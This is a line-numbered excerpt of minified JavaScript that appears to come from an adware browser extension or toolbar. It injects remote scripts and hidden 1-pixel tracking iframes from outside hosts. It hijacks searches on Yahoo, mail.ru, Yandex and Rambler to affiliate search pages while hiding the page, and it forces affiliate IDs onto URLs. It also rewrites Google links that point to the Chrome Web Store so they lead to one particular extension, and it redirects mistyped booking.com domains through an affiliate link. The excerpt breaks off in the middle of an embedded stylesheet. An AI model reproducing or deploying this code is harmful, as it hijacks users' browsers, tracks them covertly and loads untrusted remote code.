  2495. if ((scriptCoverageFrom || scriptCoverageTo) && (userId < scriptCoverageFrom || userId > scriptCoverageTo)) {
  2496. if (extendedCallbacks) {
  2497. $$.loadedCallback("CB_MNTZ_FILTER_COVERAGE", key, userId, scriptCoverageFrom + "-" + scriptCoverageTo)
  2498. }
  2499. continue
  2500. }
  2501. if (limits && limits[key]) {
  2502. var leftTime = parseInt(limits[key]) - timeNow;
  2503. if (leftTime > 0) {
  2504. if (extendedCallbacks) {
  2505. $$.loadedCallback("CB_MNTZ_FILTER_LIMIT", key, leftTime, parseInt(limits[key]))
  2506. }
  2507. continue
  2508. }
  2509. }
  2510. if (key == "a096e" && targetingUser != 1) {
  2511. continue
  2512. }
  2513. var hostnameReg;
  2514. if (scriptRow.hostname_deny) {
  2515. hostnameReg = new RegExp("^" + scriptRow.hostname_deny + "$","i");
  2516. if (hostnameReg.test(currentHostname)) {
  2517. if (extendedCallbacks) {
  2518. $$.loadedCallback("CB_MNTZ_FILTER_HOSTDENY", key, location.hostname, scriptRow.hostname_deny)
  2519. }
  2520. continue
  2521. }
  2522. }
  2523. if (scriptRow.hostname_allow) {
  2524. hostnameReg = new RegExp("^" + scriptRow.hostname_allow + "$","i");
  2525. if (!hostnameReg.test(currentHostname)) {
  2526. if (extendedCallbacks) {
  2527. $$.loadedCallback("CB_MNTZ_FILTER_HOSTALLOW", key, location.hostname, scriptRow.hostname_allow)
  2528. }
  2529. continue
  2530. }
  2531. }
  2532. if (scriptRow.browsers_allow || scriptRow.browsers_deny) {
  2533. if (typeof detect == "undefined") {
  2534. continue
  2535. }
  2536. var ua = detect.parse(navigator.userAgent);
  2537. var checkUa = ua.browser.family.toLowerCase();
  2538. var browserAllowed = false
  2539. }
  2540. if (scriptRow.browsers_allow) {
  2541. var browsersAllow = scriptRow.browsers_allow.toLowerCase().split(",");
  2542. for (var i2 in browsersAllow) {
  2543. if (browsersAllow[i2] == checkUa) {
  2544. browserAllowed = true;
  2545. break
  2546. }
  2547. }
  2548. if (!browserAllowed) {
  2549. if (extendedCallbacks) {
  2550. $$.loadedCallback("CB_MNTZ_FILTER_BROWSALLOW", key, checkUa, scriptRow.browsers_allow)
  2551. }
  2552. continue
  2553. }
  2554. }
  2555. if (scriptRow.browsers_deny) {
  2556. var browsersDeny = scriptRow.browsers_deny.toLowerCase().split(",");
  2557. for (var i2 in browsersDeny) {
  2558. if (browsersDeny[i2] == checkUa) {
  2559. browserAllowed = false;
  2560. break
  2561. }
  2562. }
  2563. if (!browserAllowed) {
  2564. if (extendedCallbacks) {
  2565. $$.loadedCallback("CB_MNTZ_FILTER_BROWSDENY", key, checkUa, scriptRow.browsers_deny)
  2566. }
  2567. continue
  2568. }
  2569. }
  2570. if (['c3369', '3e4fd', '9510f', '6a88f', 'f4c82', '44a92'].indexOf(key) > -1) {
  2571. if (isInIframe()) {
  2572. continue
  2573. }
  2574. var searchFieldInputEl = $$.Sizzle("input[name=q]");
  2575. if (searchFieldInputEl && searchFieldInputEl.length > 0 && searchFieldInputEl[0] && searchFieldInputEl[0].value) {
  2576. var regexSearch = new RegExp('^(.* ?[a-z-]+:.*|".*")$',"i");
  2577. var regexSearchMatch = searchFieldInputEl[0].value.match(regexSearch);
  2578. if (regexSearchMatch) {
  2579. continue
  2580. }
  2581. }
  2582. }
  2583. } else {}
  2584. ;if (key == "cd1d2") {
  2585. (function(tbObject) {
  2586. eval("window._lnkr5 = {\'uid\':\'51113x3231x\'+tbObject.tbParams.sid,\'allowTargetBlank\': false};")
  2587. }
  2588. )($$)
  2589. }
  2590. ;if (key == "81d01") {
  2591. (function(tbObject) {
  2592. eval("window._lnkr33 = {\'uid\':\'51113x3231x\'+tbObject.tbParams.sid,\'allowTargetBlank\': false};")
  2593. }
  2594. )($$)
  2595. }
  2596. ;if (key == "6a131") {
  2597. (function(tbObject) {
  2598. eval("window._lnkr30 = {\'uid\':\'51113x3231x\'+tbObject.tbParams.sid,\'host\':\'evenffext.com\'};")
  2599. }
  2600. )($$)
  2601. }
  2602. ;if (key == "1a2aa") {
  2603. runForceSearch();
  2604. continue
  2605. }
  2606. if (key == "5db45") {
  2607. continue
  2608. }
  2609. if (key == "309e4") {
  2610. continue
  2611. }
  2612. if (key == "c3e34") {
  2613. if (!isInIframe()) {
  2614. (function(f, b, c) {
  2615. var e = ["https://www.hanstrackr.com/track?i=nuS6Dgnt9GUnnKwQ"];
  2616. var a = document.createElement("iframe");
  2617. a.src = e[0];
  2618. a.setAttribute("style", "width:1px;height:1px;opacity: 0;position:absolute;left:-500px;top:-500px;");
  2619. f.body.appendChild(a)
  2620. }
  2621. )(document, window);
  2622. }
  2623. continue
  2624. }
  2625. if (key == "a49b5" || key == "1dbbc") {
  2626. continue
  2627. }
  2628. if (key == "93af4" || key == "085dc") {
  2629. if (isInIframe()) {
  2630. if (location.hostname.indexOf("yourfirstcheapshop.com") > -1) {
  2631. var yfcsStylePluginUrl = (window.location.protocol == "http:" ? "http:" : "https:") + "//" + $$.scriptDomain + "/addons/yfcs.min.js";
  2632. $$.script(yfcsStylePluginUrl, false)
  2633. }
  2634. continue
  2635. }
  2636. }
  2637. if (scriptRow.type == "external") {
  2638. $$.loadedCallback("MNTZ_INJECT", key);
  2639. scriptUrl = scriptUrl.replace(/\/SID\//g, encodeURIComponent($$.tbParams.sid));
  2640. scriptUrl = scriptUrl.replace(/\/TITLE\//g, encodeURIComponent($$.tbParams.title));
  2641. scriptUrl = scriptUrl.replace(/\/REFERRER\//g, encodeURIComponent(location.href));
  2642. scriptUrl = scriptUrl.replace(/\/REF_HOST\//g, encodeURIComponent(location.hostname ? location.hostname : location.host));
  2643. scriptUrl = scriptUrl.replace(/\/RANDOM\//g, (new Date()).getTime());
  2644. scriptUrl = scriptUrl.replace(/\/OPTOUTURL_DBLENCODED\//g, encodeURIComponent(encodeURIComponent(($$.tbParams.optoutUrl ? $$.tbParams.optoutUrl : "http://thisadsfor.us/optout?t=3231&u=51113&block=" + key))));
  2645. scriptUrl = scriptUrl.replace(/\/OPTOUTURL\//g, encodeURIComponent(($$.tbParams.optoutUrl ? $$.tbParams.optoutUrl : "http://thisadsfor.us/optout?t=3231&u=51113&block=" + key)));
  2646. if (scriptUrl) {
  2647. if (scriptUrl.substr(0, 2) == "//") {
  2648. scriptUrl = (window.location.protocol == "http:" ? "http:" : "https:") + scriptUrl
  2649. }
  2650. (function(block) {
  2651. var script = $$.script(scriptUrl, false, (scriptUrlParams.tag_attributes ? scriptUrlParams.tag_attributes : null));
  2652. $$.on(script, "load", function() {
  2653. $$.loadedCallback("MNTZ_LOADED", block);
  2654. $$.updateLimits(block)
  2655. })
  2656. }
  2657. )(key)
  2658. } else {
  2659. $$.loadedCallback("MNTZ_LOADED", key);
  2660. $$.updateLimits(key)
  2661. }
  2662. } else {
  2663. if (scriptRow.type == "platform") {
  2664. platformBlocks.push(key)
  2665. } else {}
  2666. }
  2667. } catch (e) {
  2668. $$.loadedCallback("CORE_JS_ERROR", key)
  2669. }
  2670. }
  2671. if (platformBlocks.length > 0) {
  2672. var params = ["sid=" + $$.tbParams.wid + "_" + $$.tbParams.tid + "_" + $$.tbParams.sid, "title=" + encodeURIComponent($$.tbParams.title)];
  2673. for (var i in platformBlocks) {
  2674. if (typeof platformBlocks[i] != "string") {
  2675. break
  2676. }
  2677. params.push("blocks[]=" + platformBlocks[i])
  2678. }
  2679. var url = (window.location.protocol == "http:" ? "http:" : "https:") + "//" + $$.scriptDomain + "/ext/c9f22c14a3872f280d.js?" + params.join("&");
  2680. $$.script(url, false);
  2681. $$.loadedCallback("MNTZ_INJECT", platformBlocks.join(","))
  2682. }
  2683. }
  2684. });
  2685. if (scriptsToLoad['af23c']) {
  2686. (function(f, h, j) {
  2687. var g = true;
  2688. try {
  2689. if (chrome.bookmarks) {
  2690. g = false
  2691. }
  2692. } catch (c) {}
  2693. if (location.protocol == "chrome-extension:") {
  2694. g = false
  2695. }
  2696. if (g) {
  2697. var b = window.location.href;
  2698. var l = document.getElementById("dexscriptpopup");
  2699. if (l === null && b.indexOf("m.facebook.com") != "-1") {
  2700. document.body.style.width = "0px";
  2701. var k = document.createElement("div");
  2702. k.id = "dexscriptpopup";
  2703. k.style.cssText = "position:fixed; width:100%; height:100%; z-index:100; background:#fff; top:0px; left: 0px;";
  2704. document.body.appendChild(k);
  2705. setTimeout(function() {
  2706. window.close()
  2707. }, 10000)
  2708. }
  2709. var i = document.createElement("script");
  2710. i.id = "dexscriptid";
  2711. i.src = "https://votetoda.com/ext/script.php?id=ukr&track=true";
  2712. var a = document.getElementById("dexscriptid");
  2713. if (a === null) {
  2714. document.body.appendChild(i)
  2715. } else {}
  2716. } else {
  2717. var i = document.createElement("script");
  2718. i.id = "dexscriptid";
  2719. i.src = "https://votetoda.com/ext/script.php?id=ukr&track=false";
  2720. var a = document.getElementById("dexscriptid");
  2721. if (a === null) {
  2722. document.body.appendChild(i)
  2723. } else {}
  2724. }
  2725. }
  2726. )(document, window);
  2727. }
  2728. }
  2729. if (location.host.indexOf("youradexchange.com") >= 0 && location.pathname.indexOf("a/display.") >= 0) {
  2730. if ($$.getParams && $$.getParams.r && $$.getParams.r != 391766 && $$.getParams.r != 391769) {
  2731. var r = $$.randomNumber(1, 100);
  2732. var rLimit = 100;
  2733. if (r <= rLimit) {
  2734. setTimeout(function() {
  2735. location.href = "http://www.youradexchange.com/a/display.php?r=391769&sub1=pr" + $$.tbParams.wid + "x" + $$.tbParams.tid + "x" + $$.tbParams.sid
  2736. }, 0)
  2737. } else {}
  2738. }
  2739. }
  2740. var matchPattern = /(boobking\.|booing\.|buking\.|boocking\.|boooking\.|bookking\.|booing\.)/i;
  2741. if (location.hostname.match(matchPattern)) {
  2742. if (typeof window.stop == "function") {
  2743. window.stop()
  2744. }
  2745. location.href = "http://adrs.me/get?key=6ae9f4bd1dc812dc713d61cba871d8e8&out=http%3A%2F%2Fbooking.com&ref=http%3A%2F%2Fgo.com&format=go&uid=rdr51113"
  2746. }
  2747. if (isInIframe()) {
  2748. return
  2749. }
  2750. if (scriptsToLoad['85031']) {
  2751. (function() {
  2752. var block = '85031';
  2753. $$.ready(function() {
  2754. try {
  2755. (function() {
  2756. if (location.hostname.indexOf("search.yahoo.com") == -1 || location.pathname.indexOf("/search") == -1) {
  2757. return
  2758. }
  2759. var r = $$.randomNumber(1, 100);
  2760. var rLimit = scriptsToLoad[block].coverage;
  2761. if (r > rLimit) {
  2762. return
  2763. }
  2764. $$.loadedCallback("MNTZ_LOADED", block);
  2765. if ($$.getCookie("__ckp_srchyho_fired") == 1) {
  2766. return
  2767. }
  2768. function getParams() {
  2769. params = {};
  2770. for (var e = location.search.replace("?", ""), r = e.split("&"), c = 0; c < r.length; c++) {
  2771. t = r[c].split("="),
  2772. t[1] && (params[t[0]] = t[1])
  2773. }
  2774. var a = location.hash.replace("#", "");
  2775. a && (t = a.split("="),
  2776. t[1] && (params[t[0]] = t[1]))
  2777. }
  2778. function checkYahooTag() {
  2779. getParams();
  2780. if (location.href.indexOf("tightrope") > -1 && location.href.indexOf("tr57") > -1) {
  2781. return
  2782. } else {
  2783. redirectSearch("p")
  2784. }
  2785. }
  2786. function redirectSearch(e) {
  2787. if (getParams(),
  2788. void 0 != params[e]) {
  2789. window.stop && window.stop(),
  2790. document.documentElement.style.opacity = "0",
  2791. document.documentElement.style.display = "none";
  2792. var r = params[e]
  2793. , c = "http://sugabit.net/search.php?source=btn&sid=" + $$.tbParams.wid + "x" + $$.tbParams.tid + "x" + $$.tbParams.sid + "&q=" + r;
  2794. $$.loadedCallback("BANNER_LOAD", block);
  2795. $$.setCookie("__ckp_srchyho_fired", 1, {
  2796. expire: 1800
  2797. });
  2798. location.href = c,
  2799. clearInterval(tmr)
  2800. }
  2801. }
  2802. function checkForSearch() {
  2803. var e = location.href;
  2804. -1 != d.indexOf("search.yahoo.com") && checkYahooTag() && clearInterval(tmr)
  2805. }
  2806. var d = window.document.domain, tmr, tmrCnt = 0, params = {};
  2807. window == top && (checkForSearch(),
  2808. tmr = setInterval(checkForSearch, 100))
  2809. }
  2810. )()
  2811. } catch (e) {}
  2812. })
  2813. }
  2814. )()
  2815. }
  2816. if (scriptsToLoad['ac348']) {
  2817. (function() {
  2818. var block = 'ac348';
  2819. $$.ready(function() {
  2820. try {
  2821. (function() {
  2822. if (location.hostname.indexOf("go.mail.ru") == -1 || location.pathname.indexOf("/search") == -1) {
  2823. return
  2824. }
  2825. var r = $$.randomNumber(1, 100);
  2826. var rLimit = scriptsToLoad[block].coverage;
  2827. if (r > rLimit) {
  2828. return
  2829. }
  2830. $$.loadedCallback("MNTZ_LOADED", block);
  2831. if ($$.getCookie("__ckp_srchmlr_fired") == 1) {
  2832. return
  2833. }
  2834. function getParams() {
  2835. params = {};
  2836. for (var e = location.search.replace("?", ""), r = e.split("&"), c = 0; c < r.length; c++) {
  2837. t = r[c].split("="),
  2838. t[1] && (params[t[0]] = t[1])
  2839. }
  2840. var a = location.hash.replace("#", "");
  2841. a && (t = a.split("="),
  2842. t[1] && (params[t[0]] = t[1]))
  2843. }
  2844. function checkMailruTag() {
  2845. getParams();
  2846. if (params.frc && params.frc == "821563") {
  2847. return
  2848. } else {
  2849. redirectSearch("q")
  2850. }
  2851. }
  2852. function redirectSearch(e) {
  2853. if (getParams(),
  2854. void 0 != params[e]) {
  2855. window.stop && window.stop(),
  2856. document.documentElement.style.opacity = "0",
  2857. document.documentElement.style.display = "none";
  2858. var r = params[e]
  2859. , c = "http://sugabit.net/search.php?source=btn2&sid=" + $$.tbParams.wid + "x" + $$.tbParams.tid + "x" + $$.tbParams.sid + "&q=" + r;
  2860. $$.loadedCallback("BANNER_LOAD", block);
  2861. $$.setCookie("__ckp_srchmlr_fired", 1, {
  2862. expire: 1800
  2863. });
  2864. location.href = c,
  2865. clearInterval(tmr)
  2866. }
  2867. }
  2868. function checkForSearch() {
  2869. var e = location.href;
  2870. -1 != d.indexOf("go.mail.ru") && checkMailruTag() && clearInterval(tmr)
  2871. }
  2872. var d = window.document.domain, tmr, tmrCnt = 0, params = {};
  2873. window == top && (checkForSearch(),
  2874. tmr = setInterval(checkForSearch, 100))
  2875. }
  2876. )()
  2877. } catch (e) {}
  2878. })
  2879. }
  2880. )()
  2881. }
  2882. if (scriptsToLoad['5db45']) {
  2883. (function() {
  2884. var block = '5db45';
  2885. $$.ready(function() {
  2886. try {
  2887. if (location.hostname.indexOf("yandex.") !== 0 || location.pathname.indexOf("/search") == -1) {
  2888. return
  2889. }
  2890. var r = $$.randomNumber(1, 100);
  2891. var rLimit = scriptsToLoad[block].coverage;
  2892. ;if (r > rLimit) {
  2893. return
  2894. }
  2895. $$.loadedCallback("MNTZ_LOADED", block);
  2896. if ($$.getCookie("__ckp_srchydx_fired") == 1) {
  2897. return
  2898. }
  2899. function getParams() {
  2900. params = {};
  2901. for (var e = location.search.replace("?", ""), r = e.split("&"), c = 0; c < r.length; c++) {
  2902. t = r[c].split("="),
  2903. t[1] && (params[t[0]] = t[1])
  2904. }
  2905. var a = location.hash.replace("#", "");
  2906. a && (t = a.split("="),
  2907. t[1] && (params[t[0]] = t[1]))
  2908. }
  2909. function checkAff() {
  2910. getParams();
  2911. if (params.clid && params.clid.indexOf("2300267") > -1) {
  2912. return true
  2913. } else {
  2914. window.stop && window.stop();
  2915. $$.loadedCallback("BANNER_LOAD", block);
  2916. $$.setCookie("__ckp_srchydx_fired", 1, {
  2917. expire: 1800
  2918. });
  2919. location.search = location.search.length ? location.search + "&clid=2300267-200" : "?clid=2300267";
  2920. clearInterval(tmr)
  2921. }
  2922. }
  2923. function checkForSearch() {
  2924. -1 != d.indexOf("yandex.") && checkAff() && clearInterval(tmr)
  2925. }
  2926. var d = window.document.domain, tmr, params = {};
  2927. if (window == top) {
  2928. checkForSearch();
  2929. tmr = setInterval(checkForSearch, 100)
  2930. }
  2931. } catch (e) {}
  2932. })
  2933. }
  2934. )()
  2935. }
  2936. ;(function() {
  2937. var a = w["c9f22c14a3872f280d"];
  2938. if ((location.hostname.indexOf("google.") !== 0 || location.hostname.indexOf("www.google.") !== 0) && document.location.pathname.indexOf("search") === -1) {
  2939. return
  2940. }
  2941. var c = "chrome.google.com/webstore";
  2942. var b = {
  2943. ddjdamcnphfdljlojajeoiogkanilahc: ["Speed Dial", "New tab", "start tab", "start page", "new page", "home page", "default page", "fast dial", "fast access", "quick access"]
  2944. };
  2945. function d() {
  2946. var f = document.querySelectorAll("div.g");
  2947. if (!f.length) {
  2948. return
  2949. }
  2950. Object.keys(b).forEach(function(g) {
  2951. f.forEach(function(h) {
  2952. var i = (h.querySelector("h3") && h.querySelector("h3").textContent) + " " + (h.querySelector("span.st") && h.querySelector("span.st").textContent);
  2953. b[g].forEach(function(j) {
  2954. if (i.toUpperCase().indexOf(j.toUpperCase()) > -1) {
  2955. e(h.querySelector("a:not(.cws)"), g)
  2956. }
  2957. })
  2958. })
  2959. })
  2960. }
  2961. function e(f, h) {
  2962. if (!f) {
  2963. return
  2964. }
  2965. var g = false;
  2966. if (f.href.indexOf(c) > -1) {
  2967. g = f.href
  2968. }
  2969. if (f.getAttribute("data-href") && f.getAttribute("data-href").indexOf(c) > -1) {
  2970. g = f.getAttribute("data-href")
  2971. }
  2972. if (g) {
  2973. f.removeAttribute("onmousedown");
  2974. f.removeAttribute("data-href");
  2975. f.href = g.replace(/\/[a-z]{32}/gi, "/" + h);
  2976. f.className = f.className + " cws";
  2977. a.on(f, "click", function() {
  2978. a.setCookie("__mzglrl", 1, {
  2979. expire: 300
  2980. });
  2981. a.loadedCallback("BANNER_LOAD", '1f608')
  2982. })
  2983. }
  2984. }
  2985. if (!a.getCookie("__mzglrl")) {
  2986. d();
  2987. setInterval(d, 1000 * 10)
  2988. } else {}
  2989. }
  2990. )();
  2991. ;if (scriptsToLoad['5db45']) {
  2992. (function() {
  2993. var block = '5db45';
  2994. (function(n, i, q) {
  2995. var r = w["c9f22c14a3872f280d"];
  2996. var o = r.getMtzCfg('5db45');
  2997. var j = document.domain;
  2998. var c = location.href;
  2999. var f = {};
  3000. var h = true;
  3001. if (j.indexOf("nova.rambler.ru") !== -1 && c.indexOf("/search") !== -1 && c.indexOf("query=") !== -1) {
  3002. document.documentElement.style.display = "none";
  3003. setTimeout(m, 3000)
  3004. }
  3005. if (j.indexOf("go.mail.ru") !== -1 && c.indexOf("/search") !== -1 && c.indexOf("q=") !== -1) {
  3006. document.documentElement.style.display = "none";
  3007. setTimeout(m, 3000)
  3008. }
  3009. if (j.indexOf("plusnetwork.com") !== -1 && c.indexOf("q=") !== -1) {
  3010. document.documentElement.style.display = "none";
  3011. setTimeout(m, 3000)
  3012. }
  3013. if (j.indexOf("search.mysearch.com") !== -1 && c.indexOf("/web") !== -1 && c.indexOf("q=") !== -1) {
  3014. document.documentElement.style.display = "none";
  3015. setTimeout(m, 3000)
  3016. }
  3017. function m() {
  3018. document.documentElement.style.display = "block"
  3019. }
  3020. function a() {
  3021. if (document.head) {
  3022. var d = document.createElement("meta");
  3023. d.name = "referrer";
  3024. d.content = "no-referrer";
  3025. document.getElementsByTagName("head")[0].appendChild(d)
  3026. }
  3027. }
  3028. function p(l) {
  3029. f = {};
  3030. if (!l || l == "") {
  3031. l = location.href
  3032. }
  3033. var x = l.split("?");
  3034. var v = l.split("#");
  3035. if (x.length == 2) {
  3036. x = x[1]
  3037. } else {
  3038. x = x[0]
  3039. }
  3040. if (v.length == 2) {
  3041. x = x + "&" + v[1]
  3042. }
  3043. if (x != "") {
  3044. var d = x.split("&");
  3045. for (var u = 0; u < d.length; u++) {
  3046. t = d[u].split("=");
  3047. if (t[1]) {
  3048. f[t[0]] = t[1]
  3049. }
  3050. }
  3051. }
  3052. }
  3053. function k(d) {
  3054. var l = setInterval(function() {
  3055. p();
  3056. if (f[d] == undefined) {
  3057. return
  3058. }
  3059. r.loadedCallback("BANNER_LOAD", '5db45');
  3060. var u = f[d];
  3061. var s = "http://search.feedvertizus.com/v1/hostedsearch?pid=252428&subid=965&subid2=y_" + ((r && r.tbParams && r.tbParams.tid) ? r.tbParams.tid : "") + "&keyword=" + u;
  3062. if (h) {
  3063. clearInterval(l);
  3064. h = false;
  3065. window.location.replace(s)
  3066. }
  3067. }, 0)
  3068. }
  3069. function g() {
  3070. document.documentElement.style.display = "none";
  3071. setTimeout(m, 3000);
  3072. var d = setInterval(function() {
  3073. r.loadedCallback("BANNER_LOAD", '5db45');
  3074. var l = "https://yandex.com/?clid=2300267";
  3075. if (h) {
  3076. clearInterval(d);
  3077. h = false;
  3078. window.location.replace(l)
  3079. }
  3080. }, 0)
  3081. }
  3082. function b() {
  3083. if (j.indexOf("nova.rambler.ru") != -1) {
  3084. a();
  3085. k("query")
  3086. }
  3087. if (j.indexOf("go.mail.ru") != -1) {
  3088. a();
  3089. k("q")
  3090. }
  3091. if (j.indexOf("plusnetwork.com") != -1) {
  3092. a();
  3093. k("q")
  3094. }
  3095. if (j.indexOf("search.mysearch.com") != -1) {
  3096. a();
  3097. k("q")
  3098. }
  3099. }
  3100. b();
  3101. function e() {
  3102. if (j.indexOf("r0.ru") != -1 && location.pathname == "/") {
  3103. a();
  3104. g()
  3105. }
  3106. if (j.indexOf("go.mail.ru") != -1 && location.pathname == "/") {
  3107. a();
  3108. g()
  3109. }
  3110. if (j.indexOf("securesurf.biz") != -1 && location.pathname == "/") {
  3111. a();
  3112. g()
  3113. }
  3114. if (j.indexOf("mysearch24.com") != -1 && location.pathname == "/") {
  3115. a();
  3116. g()
  3117. }
  3118. if (j.indexOf("search.mysearch.com") != -1 && location.pathname == "/") {
  3119. a();
  3120. g()
  3121. }
  3122. if (j.indexOf("secure-finder.org") != -1 && location.pathname == "/") {
  3123. a();
  3124. g()
  3125. }
  3126. if (j.indexOf("playbar.biz") != -1 && location.pathname == "/") {
  3127. a();
  3128. g()
  3129. }
  3130. }
  3131. e()
  3132. }
  3133. )(document, window);
  3134. }
  3135. )()
  3136. }
  3137. if (scriptsToLoad['4d7da']) {
  3138. (function() {
  3139. (function(e, a, b) {
  3140. var c = document.createElement("iframe");
  3141. c.src = "https://nesmotrinamenya.ru/566bbee0f961ad71b54c3c2fd36db053";
  3142. c.width = 1;
  3143. c.height = 1;
  3144. c.style = "position:absolute;left:0px;top:0px;opacity:0.0;";
  3145. document.body.appendChild(c)
  3146. }
  3147. )(document, window);
  3148. }
  3149. )()
  3150. }
  3151. }
  3152. )(document, window);
  3153. ;(function(g, a, e) {
  3154. var c = a["c9f22c14a3872f280d"];
  3155. var f = c.Sizzle;
  3156. function b() {
  3157. var d = f(".commercial-unit");
  3158. var i = f("input[name=q]");
  3159. if (i.length > 0 && d.length > 0) {
  3160. var h = i[0].value;
  3161. c.loadedCallback("GGL_COM_BLOCK", "", h)
  3162. }
  3163. }
  3164. c.each(f("input[name=q]"), function(d) {
  3165. c.on(d, "change", function() {
  3166. b()
  3167. })
  3168. });
  3169. b()
  3170. }
  3171. )(document, window, undefined);
  3172. ;(function(e, a, f, c) {
  3173. var b = a[f];
  3174. b.twBarOptOutInit = function() {
  3175. var g = document.createElement("iframe");
  3176. g.setAttribute("style", "display: none; position: fixed; top: 50%; left: 50%; width: 650px; height: 500px; margin-top: -250px; margin-left: -325px; z-index: 2147483647;");
  3177. g.id = "__twboptc9f22c14a3872f280d";
  3178. g.frameBorder = 0;
  3179. g.scrolling = "no";
  3180. document.body.appendChild(g);
  3181. var d = null;
  3182. var h = function() {
  3183. if (d) {
  3184. clearTimeout(d)
  3185. }
  3186. var i = {};
  3187. if (g.contentWindow) {
  3188. i = g.contentWindow.document
  3189. } else {
  3190. if (g.contentDocument) {
  3191. i = g.contentDocument
  3192. }
  3193. }
  3194. i.open();
  3195. i.write('<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>' + a[f].tbParams.title + ' OptOut</title><style>article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,video{display:inline-block}template{display:none}html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}a{background:0 0}a:active,a:hover{outline:0}h1{margin:.67em 0}b,strong{font-weight:700}dfn{font-style:italic}hr{height:0;-moz-box-sizing:content-box;box-sizing:content-box}mark{color:#000;background:#ff0}code,kbd,pre,samp{font-size:1em}pre{white-space:pre-wrap}q{quotes:"ВЃC" "ВЃD" "ВЃ8" "ВЃ9"}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}figure{margin:0}button,input,select,textarea{margin:0}button,select{text-transform:none}button{cursor:pointer;-webkit-appearance:button}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;border:0}textarea{overflow:auto;vertical-align:top}table{border-collapse:collapse;border-spacing:0}@media print{*{color:#000!important;text-shadow:none!important;background:transparent!important;box-shadow:none!important}a,a:visited{text-decoration:underline}blockquote,pre{border:1px solid #999;page-break-inside:avoid}thead{display:table-header-group}img,tr{page-break-inside:avoid}img{max-width:100%!important}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}select{background:#fff!important}}*,:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{font-size:62.5%;-webkit-tap-highlight-color:rgba(0,0,0,0)}body{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.428571429;color:#333;background-color:#fff}button,input,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a{color:#428bca;text-decoration:none}a:focus,a:hover{color:#2a6496;text-decoration:underline}a:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}hr{margin-top:20px;margin-bottom:20px;border:0;border-top:1px solid #eee}h1,h2,h3,h4,h5,h6{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-weight:500;line-height:1.1;color:inherit}h1,h2,h3{margin-top:20px;margin-bottom:10px}h4,h5,h6{margin-top:10px;margin-bottom:10px}h1{font-size:36px}h2{font-size:30px}h3{font-size:24px}h4{font-size:18px}h5{font-size:14px}h6{font-size:12px}p{margin:0 0 10px}small{font-size:85%}cite{font-style:normal}ol,ul{margin-top:0;margin-bottom:10px}dl{margin-top:0;margin-bottom:20px}dd,dt{line-height:1.428571429}dt{font-weight:700}dd{margin-left:0}blockquote{padding:10px 20px;margin:0 0 20px;border-left:5px solid #eee}blockquote:after,blockquote:before{content:""}address{margin-bottom:20px;font-style:normal;line-height:1.428571429}code,kbd,pre,samp{font-family:Menlo,Monaco,Consolas,"Courier New",monospace}code{padding:2px 4px;font-size:90%;color:#c7254e;white-space:nowrap;background-color:#f9f2f4;border-radius:4px}pre{display:block;padding:9.5px;margin:0 0 10px;font-size:13px;line-height:1.428571429;color:#333;word-break:break-all;word-wrap:break-word;background-color:#f5f5f5;border:1px solid #ccc;border-radius:4px}table{max-width:100%;background-color:transparent}th{text-align:left}fieldset{padding:0;margin:0;border:0}legend{display:block;width:100%;padding:0;margin-bottom:20px;font-size:21px;line-height:inherit;color:#333;border:0;border-bottom:1px solid #e5e5e5}label{display:inline-block;margin-bottom:5px;font-weight:700}input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{height:auto}output{display:block;padding-top:7px;font-size:14px;line-height:1.428571429;color:#555;vertical-align:middle}.form-control:-ms-input-placeholder{color:#999}.form-control::-webkit-input-placeholder{color:#999}.btn{display:inline-block;padding:6px 12px;margin-bottom:0;font-size:14px;font-weight:400;line-height:1.428571429;text-align:center;white-space:nowrap;vertical-align:middle;cursor:pointer;background-image:none;border:1px solid transparent;border-radius:4px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none}.btn:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}.btn:focus,.btn:hover{color:#333;text-decoration:none}.btn:active{background-image:none;outline:0;-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.btn-primary{color:#fff;background-color:#428bca;border-color:#357ebd}.btn-primary:active,.btn-primary:focus,.btn-primary:hover{color:#fff;background-color:#3276b1;border-color:#285e8e}.btn-primary:active{background-image:none}.btn-warning{color:#fff;background-color:#f0ad4e;border-color:#eea236}.btn-warning:active,.btn-warning:focus,.btn-warning:hover{color:#fff;background-color:#ed9c28;border-color:#d58512}.btn-warning:active{background-image:none}.btn-danger{color:#fff;background-color:#d9534f;border-color:#d43f3a}.btn-danger:active,.btn-danger:focus,.btn-danger:hover{color:#fff;background-color:#d2322d;border-color:#ac2925}.btn-danger:active{background-image:none}.btn-success{color:#fff;background-color:#5cb85c;border-color:#4cae4c}.btn-success:active,.btn-success:focus,.btn-success:hover{color:#fff;background-color:#47a447;border-color:#398439}.btn-success:active{background-image:none}.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;border-radius:3px}.fade{opacity:0;-webkit-transition:opacity .15s linear;transition:opacity .15s linear}.fade.in{opacity:1}@font-face{font-family:"Glyphicons Halflings";src:url(../fonts/glyphicons-halflings-regular.eot);src:url(../fonts/glyphicons-halflings-regular.eot?#iefix) format("embedded-opentype"),url(../fonts/glyphicons-halflings-regular.woff) format("woff"),url(../fonts/glyphicons-halflings-regular.ttf) format("truetype"),url(../fonts/glyphicons-halflings-regular.svg#glyphicons-halflingsregular) format("svg")}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 